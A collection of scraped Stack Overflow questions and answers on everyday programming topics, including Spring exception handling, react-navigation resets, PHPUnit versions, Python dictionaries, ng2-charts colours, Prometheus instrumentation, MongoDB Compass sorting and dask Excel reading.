Create a class with static properites which will simulate your enum:
public class Persons {
final public static int CHILD = 0;
final public static int PARENT = 1;
final public static int GRANDPARENT = 2;
}
Then use just like enum:
Persons.CHILD
It will work for most simple use cases. Otherwise you might be missing on options like valueOf(), EnumSet, EnumMap or values().
| stackoverflow | {
"language": "en",
"length": 1458,
"provenance": "stackexchange_0000F.jsonl.gz:900743",
"question_score": "48",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654291"
} |
fcbc5912e59af39ee20fcfc228fe321f5d3984ef | Stackoverflow Stackexchange
Q: spring mvc validation exceptions are not handled by ControllerAdvice I have a controller in spring boot application, which validate the input using Hibernate Validator. When ever I call the rest endpoint, it validate correctly, but my controller advice doesn't catch it, to customise the message. We only get 404 code with empty payload.
@RestController
public class Controller {
@RequestMapping(method = RequestMethod.POST, path = RestPaths.LOAD_DATA)
public void loadCostCenterData(@RequestBody @Valid ClientDto dto) {
}
}
@RestControllerAdvice
public class WickesGlobalExceptionMapper extends ResponseEntityExceptionHandler {
@ExceptionHandler(Exception.class)
public ResponseEntity handleOtherUnexpectedException(Exception ex, WebRequest request) {
}
}
A: Here is a working ControllerAdvise that uses ModelView instead of ResponseEntity:
@ControllerAdvice
public class WickesGlobalExceptionMapper {
@ExceptionHandler(IllegalArgumentException.class)
@ResponseStatus(HttpStatus.BAD_REQUEST)
public ModelAndView handleInvalidArgument(IllegalArgumentException ex) {
ModelAndView modelAndView = new ModelAndView();
modelAndView.setView(new MappingJackson2JsonView());
modelAndView.addObject("errorMessage", format("{0}", errorMessage));
return modelAndView;
}
}
| Q: spring mvc validation exceptions are not handled by ControllerAdvice I have a controller in spring boot application, which validate the input using Hibernate Validator. When ever I call the rest endpoint, it validate correctly, but my controller advice doesn't catch it, to customise the message. We only get 404 code with empty payload.
@RestController
public class Controller {
@RequestMapping(method = RequestMethod.POST, path = RestPaths.LOAD_DATA)
public void loadCostCenterData(@RequestBody @Valid ClientDto dto) {
}
}
@RestControllerAdvice
public class WickesGlobalExceptionMapper extends ResponseEntityExceptionHandler {
@ExceptionHandler(Exception.class)
public ResponseEntity handleOtherUnexpectedException(Exception ex, WebRequest request) {
}
}
A: Here is a working ControllerAdvise that uses ModelView instead of ResponseEntity:
@ControllerAdvice
public class WickesGlobalExceptionMapper {
@ExceptionHandler(IllegalArgumentException.class)
@ResponseStatus(HttpStatus.BAD_REQUEST)
public ModelAndView handleInvalidArgument(IllegalArgumentException ex) {
ModelAndView modelAndView = new ModelAndView();
modelAndView.setView(new MappingJackson2JsonView());
modelAndView.addObject("errorMessage", format("{0}", errorMessage));
return modelAndView;
}
}
| stackoverflow | {
"language": "en",
"length": 129,
"provenance": "stackexchange_0000F.jsonl.gz:900775",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654390"
} |
5d08655e468c95ab2b5b25432310477826bf8367 | Stackoverflow Stackexchange
Q: D3.js Orthographic projection and artefacts? I have an issue with the representation of a geoJSON file (milky way).
It seems that the contours are, in some cases (depending on the rotation), misinterpreted or actually closed the wrong way. See the attached screenshots and the codepen https://codepen.io/anon/pen/wdYmqL where you can manually rotate the projection.
We can also see the artefact in d3-celestial (https://github.com/ofrohn/d3-celestial) here:
http://armchairastronautics.blogspot.de/p/skymap.html
Does anybody know what happens? Any solution? Thanks ;)
Code:
var path = d3.geoPath()
.projection(d3.geoOrthographic());
g.selectAll("path")
.data(milkyWayGeoJson.features)
.enter().append('path')
.attr("class", "mw")
.attr("d", path);
| Q: D3.js Orthographic projection and artefacts? I have an issue with the representation of a geoJSON file (milky way).
It seems that the contours are, in some cases (depending on the rotation), misinterpreted or actually closed the wrong way. See the attached screenshots and the codepen https://codepen.io/anon/pen/wdYmqL where you can manually rotate the projection.
We can also see the artefact in d3-celestial (https://github.com/ofrohn/d3-celestial) here:
http://armchairastronautics.blogspot.de/p/skymap.html
Does anybody know what happens? Any solution? Thanks ;)
Code:
var path = d3.geoPath()
.projection(d3.geoOrthographic());
g.selectAll("path")
.data(milkyWayGeoJson.features)
.enter().append('path')
.attr("class", "mw")
.attr("d", path);
| stackoverflow | {
"language": "en",
"length": 87,
"provenance": "stackexchange_0000F.jsonl.gz:900785",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654439"
} |
d1b4f99ab4a0c5bf844fb14d5131bb6a8253b74f | Stackoverflow Stackexchange
Q: Blocked Access to geolocation was blocked over secure connection with mixed content I'm using a plugin in WordPress that uses the Google Maps API but keep getting this error:
[blocked] Access to geolocation was blocked over secure connection with mixed content to...
My site is on SSL, and I've checked that the google API script is not trying to be pulled in via http (it is https as it should be).
I'm not sure what could be causing this issue. Maybe there is something I need to do in my htaccess file? Please help! Thanks!
A: Check below list,
*
*Your site have http link instead of https links, so only you facing the mixed content warning( you can fine this warning in your browser console). Find those links in your website and change those as a https links.
*Add google API key in configuration.
https://developers.google.com/maps/documentation/javascript/get-api-key
| Q: Blocked Access to geolocation was blocked over secure connection with mixed content I'm using a plugin in WordPress that uses the Google Maps API but keep getting this error:
[blocked] Access to geolocation was blocked over secure connection with mixed content to...
My site is on SSL, and I've checked that the google API script is not trying to be pulled in via http (it is https as it should be).
I'm not sure what could be causing this issue. Maybe there is something I need to do in my htaccess file? Please help! Thanks!
A: Check below list,
*
*Your site have http link instead of https links, so only you facing the mixed content warning( you can fine this warning in your browser console). Find those links in your website and change those as a https links.
*Add google API key in configuration.
https://developers.google.com/maps/documentation/javascript/get-api-key
| stackoverflow | {
"language": "en",
"length": 147,
"provenance": "stackexchange_0000F.jsonl.gz:900798",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654475"
} |
c1dc5a6fba72ef8712bdbefea1102cec1b7565b2 | Stackoverflow Stackexchange
Q: How to reset the state of a StackNavigator nested in a DrawerNavigatior? I am building an app whose navigation is based on a DrawerNavigator from the react-navigation library.
This navigator has 3 tabs:
*
*2 regular tabs
*1 StackNavigator named "Search"
The StackNavigator consists of one screen that lets the user search for an item, and a second screen where the user sees the search results.
I do not want the search results page to be a tab of a DrawerNavigator, this is why I implemented this structure.
The problem is: if the user has already performed a search, when he clicks on the "Search" tab, he does not come back to the search screen but to the search results screen. I would prefer that the user comes back to the search screen.
How can I achieve that?
A: You can achive this using navigation dispatch with navigationActions
import { NavigationActions } from 'react-navigation';
const resetAction = NavigationActions.reset({
index: 0,
actions: [
NavigationActions.navigate({
routeName: 'DrawerScreen',
params: {},
action: NavigationActions.navigate({ routeName: 'SearchScreen' }),
}),
],
})
navigation.dispatch(resetAction)
| Q: How to reset the state of a StackNavigator nested in a DrawerNavigatior? I am building an app whose navigation is based on a DrawerNavigator from the react-navigation library.
This navigator has 3 tabs:
*
*2 regular tabs
*1 StackNavigator named "Search"
The StackNavigator consists of one screen that lets the user search for an item, and a second screen where the user sees the search results.
I do not want the search results page to be a tab of a DrawerNavigator, this is why I implemented this structure.
The problem is: if the user has already performed a search, when he clicks on the "Search" tab, he does not come back to the search screen but to the search results screen. I would prefer that the user comes back to the search screen.
How can I achieve that?
A: You can achive this using navigation dispatch with navigationActions
import { NavigationActions } from 'react-navigation';
const resetAction = NavigationActions.reset({
index: 0,
actions: [
NavigationActions.navigate({
routeName: 'DrawerScreen',
params: {},
action: NavigationActions.navigate({ routeName: 'SearchScreen' }),
}),
],
})
navigation.dispatch(resetAction)
A: import { NavigationActions } from 'react-navigation';
const resetAction = NavigationActions.reset({
index: 0,
actions: [
NavigationActions.navigate({ routeName: 'SearchScreen'})
]
})
Here in your button or any element with event add this:
this.props.navigation.dispatch(resetAction)
<Button
onPress= {
() => this.props.navigation.dispatch(resetAction)
}
title='Back to Search'
/>
| stackoverflow | {
"language": "en",
"length": 220,
"provenance": "stackexchange_0000F.jsonl.gz:900801",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654483"
} |
5510ca4b5a461f53f61e219fbace05c6d2331770 | Stackoverflow Stackexchange
Q: class PHPUnit\Framework\ExpectationFailedException not found when I try to run a failed test with this command :
./vendor/bin/phpunit
I get this Fatal Error :
PHPUnit 5.7.20 by Sebastian Bergmann and contributors.
PHP Fatal error: Class 'PHPUnit\Framework\ExpectationFailedException'
not found in /var/www/zend/vendor/zendframework/zend-
test/src/PHPUnit/Controller/AbstractControllerTestCase.php on line 444
A: Your version of phpunit is probably too old for your version of Zend. The class PHPUnit\Framework\ExpectationFailedException have been renamed in PhpUnit 6.X from PHPUnit_Framework_ExpectationFailedException to ExpectationFailedException
Please check your PhpUnit version: phpunit --version, it should be 6.X. Update it to the last version to avoid this error.
| Q: class PHPUnit\Framework\ExpectationFailedException not found when I try to run a failed test with this command :
./vendor/bin/phpunit
I get this Fatal Error :
PHPUnit 5.7.20 by Sebastian Bergmann and contributors.
PHP Fatal error: Class 'PHPUnit\Framework\ExpectationFailedException'
not found in /var/www/zend/vendor/zendframework/zend-
test/src/PHPUnit/Controller/AbstractControllerTestCase.php on line 444
A: Your version of phpunit is probably too old for your version of Zend. The class PHPUnit\Framework\ExpectationFailedException have been renamed in PhpUnit 6.X from PHPUnit_Framework_ExpectationFailedException to ExpectationFailedException
Please check your PhpUnit version: phpunit --version, it should be 6.X. Update it to the last version to avoid this error.
A: This is a configuration flaw in zend-test. It consumes classes from Phpunit 6 but per it's Composer requirements, Phpunit before that version are OK to require:
"phpunit/phpunit": "^4.0 || ^5.0 || ^6.0",
Most likely as your system because of the PHP version does not satisfy the requirements of Phpunit 6, the next lower version was installed.
As the code in the base test case (https://github.com/zendframework/zend-test/blob/master/src/PHPUnit/Controller/AbstractControllerTestCase.php#L444) makes use of Phpunit 6 classes, I strongly assume that when the configuration flaw is made aware to the Zend-Test project, you won't be even able to install on your system any longer.
Therefore upgrade to a recent PHP version and then run
composer update
If you're stuk with the PHP version, downgrade zend-test to a version that supports an older Phpunit version. I don't know that project well, so it's just a suggestion, I don't know if such a version exists or can't even recommend one.
I filed a report, perhaps using that one class was an oversight or there is a less hard way to resolve the dependency: https://github.com/zendframework/zend-test/issues/50
A: This is "fixed" by a script in Zend\Test called phpunit-class-aliases.php but it's not configured properly IMHO since it's in the autoload-dev section (meaning it doesn't propagate out to other projects.)
So, in your project composer.json, do something like this:
"autoload-dev": {
"files": [
"vendor/zendframework/zend-test/autoload/phpunit-class-aliases.php"
]
},
Then composer install
N.B. Zend\Test has a pull request that fixes this very thing, but they're saying it's PHPUnit's fault (Shame on you PHPUnit 4 for... idunno... having the wrong class name according to Zend\Test) So, I've done it instead: composer require illchuk/phpunit-class-aliases
| stackoverflow | {
"language": "en",
"length": 359,
"provenance": "stackexchange_0000F.jsonl.gz:900823",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654541"
} |
eff285adb05723ae5107dfd28af56cdcd585f364 | Stackoverflow Stackexchange
Q: Extract sub dictionary from keys that appear in a given list Consider that I have a dictionary that looks like this:
{1=>a, 2=>b, 3=>c, 4=>d}
and a list that looks like this:
[1, 2, 3]
is there a method that'd return me a subdictionary only containing
{1=>a, 2=>b, 3=>c}
A: a regular dict-comprehension would do that:
d = {1: 'a', 2: 'b', 3: 'c', 4: 'd'}
keys = [1, 2, 3]
dct = {key: d[key] for key in keys}
print(dct) # {1: 'a', 2: 'b', 3: 'c'}
there are 2 ways to handle keys in keys that are not in the original dictionary:
keys = [1, 2, 3, 7]
# default value None
dct = {key: d[key] if key in d else None for key in keys}
print(dct) # {1: 'a', 2: 'b', 3: 'c', 7: None}
# ignore the key if it is not in the original dict
dct = {key: d[key] for key in set(keys).intersection(d.keys())}
print(dct) # {1: 'a', 2: 'b', 3: 'c'}
| Q: Extract sub dictionary from keys that appear in a given list Consider that I have a dictionary that looks like this:
{1=>a, 2=>b, 3=>c, 4=>d}
and a list that looks like this:
[1, 2, 3]
is there a method that'd return me a subdictionary only containing
{1=>a, 2=>b, 3=>c}
A: a regular dict-comprehension would do that:
d = {1: 'a', 2: 'b', 3: 'c', 4: 'd'}
keys = [1, 2, 3]
dct = {key: d[key] for key in keys}
print(dct) # {1: 'a', 2: 'b', 3: 'c'}
there are 2 ways to handle keys in keys that are not in the original dictionary:
keys = [1, 2, 3, 7]
# default value None
dct = {key: d[key] if key in d else None for key in keys}
print(dct) # {1: 'a', 2: 'b', 3: 'c', 7: None}
# ignore the key if it is not in the original dict
dct = {key: d[key] for key in set(keys).intersection(d.keys())}
print(dct) # {1: 'a', 2: 'b', 3: 'c'}
| stackoverflow | {
"language": "en",
"length": 166,
"provenance": "stackexchange_0000F.jsonl.gz:900826",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654547"
} |
8f5adb9c1da43a2d67b6930b1f745e3dbef71b08 | Stackoverflow Stackexchange
Q: Python return with multiple dictionaries from a function my problem is that I have two function and one of it's return value is two dictionaries in the following way:
def fnct1():
return dict1, dict2
so it's returning into my other function which return value is the two dictionaries from the previous function and also a new dictionary, so something like this
def fnct2():
return dict3, fnct(1)
the problem with this is that is has the following result:
({dict3},({dict1},{dict2})
but I want it to look the following way:
({dict3},{dict1},{dict2})
A: You could unpack the values from fnct1() before returning them:
def fnct2():
dict1, dict2 = fnct1()
return dict3, dict1, dict2
| Q: Python return with multiple dictionaries from a function my problem is that I have two function and one of it's return value is two dictionaries in the following way:
def fnct1():
return dict1, dict2
so it's returning into my other function which return value is the two dictionaries from the previous function and also a new dictionary, so something like this
def fnct2():
return dict3, fnct(1)
the problem with this is that is has the following result:
({dict3},({dict1},{dict2})
but I want it to look the following way:
({dict3},{dict1},{dict2})
A: You could unpack the values from fnct1() before returning them:
def fnct2():
dict1, dict2 = fnct1()
return dict3, dict1, dict2
A: Since your function returns a tuple, you need to either return the individual tuple items, or unpack them:
def fnct1():
dict1 = { "name": "d1" }
dict2 = { "name": "d2" }
return dict1, dict2
def fnct2():
dict3 = { "name": "d3" }
res = fnct1()
return dict3, res[0], res[1] # return the individual tuple elements
# alternative implementation of fnct2:
def fnct2():
dict3 = { "name": "d3" }
d1, d2 = fnct1() # unpack your tuple
return dict3, d1, d2
print(fnct2())
# Output: ({'name': 'd3'}, {'name': 'd1'}, {'name': 'd2'})
A: If you say the returned value of the 1st function is a. In the 2nd just return a[0], a[1], otherDict.
| stackoverflow | {
"language": "en",
"length": 222,
"provenance": "stackexchange_0000F.jsonl.gz:900828",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654549"
} |
405a8f654b4e1bdba8e13c2750ca886e9dfa88bb | Stackoverflow Stackexchange
Q: Chart.js ng2-charts colors in pie chart not showing I am using ng-2 charts and while I can display the pie chart correctly, I am not able to change the colors of the different pie slices.
It seems like there is a bug where all the slices of the pie get the first color declared in the object (in this case red).
My component.ts looks like :
public pieChartColors:Array<any> = [
{
backgroundColor: 'red',
borderColor: 'rgba(135,206,250,1)',
},
{
backgroundColor: 'yellow',
borderColor: 'rgba(106,90,205,1)',
},
{
backgroundColor: 'rgba(148,159,177,0.2)',
borderColor: 'rgba(148,159,177,1)',
}
];
// Pie
public pieChartLabels:string[] = ['First Set', 'Sales', 'Mail'];
public pieChartData:number[] = [300, 500, 100];
public pieChartType:string = 'pie';
My view:
<canvas
[chartType]="pieChartType"
[colors]="pieChartColors"
[data]="pieChartData"
[labels]="pieChartLabels"
baseChart
></canvas>
A: Solved this problem by adding *ngIf="pieChartLabels && pieChartData" condition in the HTML template:
<div class="card">
<div class="card-header">
Pie Chart
</div>
<div class="card-body">
<div class="chart-wrapper" *ngIf="pieChartLabels && pieChartData">
<canvas baseChart class="chart"
[data]="pieChartData"
[labels]="pieChartLabels"
[chartType]="pieChartType"
(chartHover)="chartHovered($event)"
(chartClick)="chartClicked($event)">
</canvas>
</div>
</div>
</div>
| Q: Chart.js ng2-charts colors in pie chart not showing I am using ng-2 charts and while I can display the pie chart correctly, I am not able to change the colors of the different pie slices.
It seems like there is a bug where all the slices of the pie get the first color declared in the object (in this case red).
My component.ts looks like :
public pieChartColors:Array<any> = [
{
backgroundColor: 'red',
borderColor: 'rgba(135,206,250,1)',
},
{
backgroundColor: 'yellow',
borderColor: 'rgba(106,90,205,1)',
},
{
backgroundColor: 'rgba(148,159,177,0.2)',
borderColor: 'rgba(148,159,177,1)',
}
];
// Pie
public pieChartLabels:string[] = ['First Set', 'Sales', 'Mail'];
public pieChartData:number[] = [300, 500, 100];
public pieChartType:string = 'pie';
My view:
<canvas
[chartType]="pieChartType"
[colors]="pieChartColors"
[data]="pieChartData"
[labels]="pieChartLabels"
baseChart
></canvas>
A: Solved this problem by adding *ngIf="pieChartLabels && pieChartData" condition in the HTML template:
<div class="card">
<div class="card-header">
Pie Chart
</div>
<div class="card-body">
<div class="chart-wrapper" *ngIf="pieChartLabels && pieChartData">
<canvas baseChart class="chart"
[data]="pieChartData"
[labels]="pieChartLabels"
[chartType]="pieChartType"
(chartHover)="chartHovered($event)"
(chartClick)="chartClicked($event)">
</canvas>
</div>
</div>
</div>
A: Try something like the following ...
public pieChartColors: Array < any > = [{
backgroundColor: ['red', 'yellow', 'rgba(148,159,177,0.2)'],
borderColor: ['rgba(135,206,250,1)', 'rgba(106,90,205,1)', 'rgba(148,159,177,1)']
}];
...
not a 'ng2-charts' pro, but afaik this should work.
A: I agree with above answer, I would like to provide details if someone needs it. my example is in PIE chart it works for others too.
Step-1:
Add the following in your component.ts file
public pieChartOptions: ChartOptions = {
responsive: true,
};
public pieChartLabels: Label[] = [['Not', 'Completed'], ['Completed', 'Tasks'], 'Pending Tasks'];
public pieChartData: SingleDataSet = [300, 500, 100];
public pieChartType: ChartType = 'pie';
public pieChartLegend = true;
public pieChartPlugins = [];
public pieChartColors: Array < any > = [{
backgroundColor: ['#fc5858', '#19d863', '#fdf57d'],
borderColor: ['rgba(252, 235, 89, 0.2)', 'rgba(77, 152, 202, 0.2)', 'rgba(241, 107, 119, 0.2)']
}];
chartClicked(e){
console.log(e);
console.log('=========Chart clicked============');
}
chartHovered(e){
console.log(e);
console.log('=========Chart hovered============');
}
Step-2 :
Your component.html should look something like below:
<canvas baseChart
[data]="pieChartData"
[labels]="pieChartLabels"
[chartType]="pieChartType"
[options]="pieChartOptions"
[plugins]="pieChartPlugins"
[legend]="pieChartLegend"
[colors]="pieChartColors"
(chartHover)="chartHovered($event)"
(chartClick)="chartClicked($event)"
>
</canvas>
A: HTML:
<canvas baseChart width="200" height="200"
[data]="chartData"
[options]="chartOptions"
[type]="chartType">
</canvas>
TS:
import { Component, OnInit, ViewChild } from '@angular/core';
import { ChartConfiguration, ChartData, ChartType } from 'chart.js';
import { BaseChartDirective } from 'ng2-charts';
export class MyChartComponent implements OnInit {
@ViewChild(BaseChartDirective) chart: BaseChartDirective | undefined;
constructor() { }
ngOnInit(): void {}
public chartOptions: ChartConfiguration['options'] = {
responsive: true,
plugins: {
legend: {
display: true,
position: 'top',
},
},
};
public chartData: ChartData<'pie', number[], string | string[]> = {
labels: ['Low', 'Middle', 'High'],
datasets: [{
data: [25, 40, 35],
backgroundColor: ['rgba(0, 160, 0, 1)', 'rgba(240, 160, 0, 1)', 'rgba(220, 0, 0, 1)'],
borderColor: ['rgba(250, 250, 250, 1)', 'rgba(250, 250, 250, 1)', 'rgba(250, 250, 250, 1)'],
hoverBackgroundColor: ['rgba(0, 160, 0, 0.8)', 'rgba(240, 160, 0, 0.8)', 'rgba(220, 0, 0, 0.8)'],
hoverBorderColor: ['rgba(0, 160, 0, 1)', 'rgba(240, 160, 0, 1)', 'rgba(220, 0, 0, 1)'],
}],
};
public chartType: ChartType = 'pie';
}
And change these colors to your own ones.
| stackoverflow | {
"language": "en",
"length": 478,
"provenance": "stackexchange_0000F.jsonl.gz:900857",
"question_score": "7",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654665"
} |
a5a87a8c01a2fb8b413d5fedc349e64abf6dd293 | Stackoverflow Stackexchange
Q: What does "instrument" exactly mean in prometheus Recently I am learning an open source systems monitoring and alerting toolkit Prometheus.
I read the online documentation carefully. There is a glossary named "Instrument" (instrumentation or instrumenting) in Prometheus. For me it's not very easy to understand. Perhaps it's because this word has so many different meanings when I searched in my dictionary, and none of them are suitable to help me understand it in Prometheus context (My native language is not English).
Could someone explain its meaning in a simple way? And what is "instrumentation" for and why we need it in Prometheus?
Many thanks for your help.
A: In the context of Prometheus, instrumentation is the use of a library in an application's code base in order to expose and update metrics about it for a Prometheus instance to scrape.
For example, one could use the Prometheus Python client (contains example) in their python based application to expose metrics about it to be scraped.
| Q: What does "instrument" exactly mean in prometheus Recently I am learning an open source systems monitoring and alerting toolkit Prometheus.
I read the online documentation carefully. There is a glossary named "Instrument" (instrumentation or instrumenting) in Prometheus. For me it's not very easy to understand. Perhaps it's because this word has so many different meanings when I searched in my dictionary, and none of them are suitable to help me understand it in Prometheus context (My native language is not English).
Could someone explain its meaning in a simple way? And what is "instrumentation" for and why we need it in Prometheus?
Many thanks for your help.
A: In the context of Prometheus, instrumentation is the use of a library in an application's code base in order to expose and update metrics about it for a Prometheus instance to scrape.
For example, one could use the Prometheus Python client (contains example) in their python based application to expose metrics about it to be scraped.
A: In the Prometheus context, instrumentation is adding code to create and update metrics inside your application. Here's a simple Java guide.
It's needed in Prometheus as it's the best way to get the data that you'll then graph and alert on in Prometheus itself.
A: In the context of Prometheus, instrumentation means adding and exposing your own custom metrics. Say, you want to know how many people are clicking on a button, then you can create a counter metric for this purpose. Tracking the number of API calls being made on an API is another place where you can add and expose your own custom metric.
Prometheus provides you different client libraries which can be used to instrument your application depending on the language you're using in your application/service.
| stackoverflow | {
"language": "en",
"length": 295,
"provenance": "stackexchange_0000F.jsonl.gz:900860",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654679"
} |
fb141497b8017090ee33f8765505576f0a4af74b | Stackoverflow Stackexchange
Q: Why does GCC 6.3 compile this Braced-Init-List code without explicit C++11 support? I have a question about the different meanings of a curly-brace enclosed list.
I know that C++03 did not support C++11's initializer_list. Yet, even without the -std=c++11 compiler flag, gcc 6.3 will properly initialize interpolate with this code:
map<string, string> interpolate = { { "F", "a && b && c" }, { "H", "p ^ 2 + w" }, { "K", "H > 10 || e < 5" }, { "J", "F && !K" } };
I was challenged on why this would work, and I realized I didn't have an answer. This is a Brace-Init-List, but the way we get from that to initializing a standard container is typically through an initializer_list. So how would non-C++11 code be accomplishing the initialization?
A: The default compiler command for gcc 6.x is -std=gnu++14, so the compiler is implicitly compiling your code using a later version of the C++ language standard.
You will need to manually specify -std=c++03 if you want to compile in C++03.
| Q: Why does GCC 6.3 compile this Braced-Init-List code without explicit C++11 support? I have a question about the different meanings of a curly-brace enclosed list.
I know that C++03 did not support C++11's initializer_list. Yet, even without the -std=c++11 compiler flag, gcc 6.3 will properly initialize interpolate with this code:
map<string, string> interpolate = { { "F", "a && b && c" }, { "H", "p ^ 2 + w" }, { "K", "H > 10 || e < 5" }, { "J", "F && !K" } };
I was challenged on why this would work, and I realized I didn't have an answer. This is a Brace-Init-List, but the way we get from that to initializing a standard container is typically through an initializer_list. So how would non-C++11 code be accomplishing the initialization?
A: The default compiler command for gcc 6.x is -std=gnu++14, so the compiler is implicitly compiling your code using a later version of the C++ language standard.
You will need to manually specify -std=c++03 if you want to compile in C++03.
| stackoverflow | {
"language": "en",
"length": 176,
"provenance": "stackexchange_0000F.jsonl.gz:900870",
"question_score": "13",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654713"
} |
c70e127f14c0267c224e768209cc3d5efb16a068 | Stackoverflow Stackexchange
Q: How to sort data using MongoDB Compass I'm currently trying to use MongoDB Compass to query my collection. However, I seem to be only able to filter the data.
Is there any way for me to sort the data as well? I would like to sort my data in ascending order using one of my data fields.
If MongoDB Compass isn't the best way to order a collection, what other GUI could I use?
A: Using MongoDB Compass 1.7 or newer, you can sort (and project, skip, or limit) results by choosing the Documents tab and expanding the Options.
To sort in ascending order by a field myField, use { myField:1 }. Any of the usual cursor sort() options can be provided, including ordering results by multiple fields.
Note: options like sort and skip are not available in the default Schema tab because this view uses sampling to find a random set of documents, as opposed to the Documents view which displays a specific query result.
| Q: How to sort data using MongoDB Compass I'm currently trying to use MongoDB Compass to query my collection. However, I seem to be only able to filter the data.
Is there any way for me to sort the data as well? I would like to sort my data in ascending order using one of my data fields.
If MongoDB Compass isn't the best way to order a collection, what other GUI could I use?
A: Using MongoDB Compass 1.7 or newer, you can sort (and project, skip, or limit) results by choosing the Documents tab and expanding the Options.
To sort in ascending order by a field myField, use { myField:1 }. Any of the usual cursor sort() options can be provided, including ordering results by multiple fields.
Note: options like sort and skip are not available in the default Schema tab because this view uses sampling to find a random set of documents, as opposed to the Documents view which displays a specific query result.
| stackoverflow | {
"language": "en",
"length": 167,
"provenance": "stackexchange_0000F.jsonl.gz:900872",
"question_score": "29",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654722"
} |
26eb7f98526e032bd594734b23b7f447c90753a3 | Stackoverflow Stackexchange
Q: How to link external diff tool(beyond compare) in source tree? I am using Source tree client for Git on windows 7. I have used beyond compare with tortoisehg client for mercurial and I like to use Beyond compare itself as diff too in SourceTree too. I set the diff tool to beyond compare in Tools -> Options but not sure how to launch diff too via source tree for any file. Double click on file should usually bring up diff view. Right-click -> Custom action also does nothing.
Beyond compare 3.3.13 & source tree 2.1.2.5
Please let me know how to configure this.
A: It works for me:
*
*After the installation, check whether you have set this in SourceTree options:
*Right click on the file(s) you want to compare and fire up Beyond Compare:
Beyond Compare 4.2.2 & SourceTree 2.1.2.5
Also please make sure your Beyond Compare trial period has not ended
| Q: How to link external diff tool(beyond compare) in source tree? I am using Source tree client for Git on windows 7. I have used beyond compare with tortoisehg client for mercurial and I like to use Beyond compare itself as diff too in SourceTree too. I set the diff tool to beyond compare in Tools -> Options but not sure how to launch diff too via source tree for any file. Double click on file should usually bring up diff view. Right-click -> Custom action also does nothing.
Beyond compare 3.3.13 & source tree 2.1.2.5
Please let me know how to configure this.
A: It works for me:
*
*After the installation, check whether you have set this in SourceTree options:
*Right click on the file(s) you want to compare and fire up Beyond Compare:
Beyond Compare 4.2.2 & SourceTree 2.1.2.5
Also please make sure your Beyond Compare trial period has not ended
A: In addition of the file compare/merge, I use the sourcetree custom actions in order to compare two commits as folder comparison.
Assuming git & beyond compare in the PATH, you can add this following custom action in Sourcetree (Tools > Option > Custom Actions):
Script: git
Parameters: difftool -d --tool=bc4 $SHA
Tested with Sourcetree 3.4.8, git 2.35, beyond compare 4.4.2
A: The following worked for me in few easy steps:
*
*Configured git to use beyond control as the diff and merge tools as per official documentation.
https://www.scootersoftware.com/support.php?zz=kb_vcs#gitwindows
*Setup sourcetree custom command enabling diff using Beyond compare by selecting two commits similar to TortoiseHG.
SourceTree->Tools->Options->Custom Actions
Script to run: git
Parameters: difftool --dir-diff $SHA
| stackoverflow | {
"language": "en",
"length": 269,
"provenance": "stackexchange_0000F.jsonl.gz:900902",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654838"
} |
f91227249226aead1706eda2d35650457f9a581c | Stackoverflow Stackexchange
Q: Parallel excel sheet read from dask
Hello All the examples that I came across for using dask thus far has
been multiple csv files in a folder being read using dask read_csv
call.
if I am provided an xlsx file with multiple tabs, can I use anything
in dask to read them parallely?
P.S. I am using pandas 0.19.2 with python 2.7
A: For those using Python 3.6:
#reading the file using dask
import dask
import dask.dataframe as dd
from dask.delayed import delayed
parts = dask.delayed(pd.read_excel)(excel_file, sheet_name=0, usecols = [1, 2, 7])
df = dd.from_delayed(parts)
print(df.head())
I'm seeing a 50% speed increase on load on a i7, 16GB 5th Gen machine.
| Q: Parallel excel sheet read from dask
Hello All the examples that I came across for using dask thus far has
been multiple csv files in a folder being read using dask read_csv
call.
if I am provided an xlsx file with multiple tabs, can I use anything
in dask to read them parallely?
P.S. I am using pandas 0.19.2 with python 2.7
A: For those using Python 3.6:
#reading the file using dask
import dask
import dask.dataframe as dd
from dask.delayed import delayed
parts = dask.delayed(pd.read_excel)(excel_file, sheet_name=0, usecols = [1, 2, 7])
df = dd.from_delayed(parts)
print(df.head())
I'm seeing a 50% speed increase on load on a i7, 16GB 5th Gen machine.
A: A simple example
fn = 'my_file.xlsx'
parts = [dask.delayed(pd.read_excel)(fn, i, **other_options)
for i in range(number_of_sheets)]
df = dd.from_delayed(parts, meta=parts[0].compute())
Assuming you provide the "other options" to extract the data (which is uniform across sheets) and you want to make a single master data-frame out of the set.
Note that I don't know the internals of the excel reader, so how parallel the reading/parsing part would be is uncertain, but subsequent computations once the data are in memory would definitely be.
| stackoverflow | {
"language": "en",
"length": 193,
"provenance": "stackexchange_0000F.jsonl.gz:900926",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654906"
} |
9ade63bf9bf1005aaaea1fc13b63c52b0b501797 | Stackoverflow Stackexchange
Q: Set twig variable to json file as an include I have created twig templates and save all the content in a jsonfile. Like this:
Json Data:
{% set contentElements = {
"json structur": {....}
"json structur": {....}
%}
Unfortunately over the years the json files has become bigger and bigger.
So i want to splitt the json data into snippets.
It is possible to set the variable contentElements to an include?
It is not working but something like this:
{% set contentElements = include"content.json "%}
Its an static HTML Project.
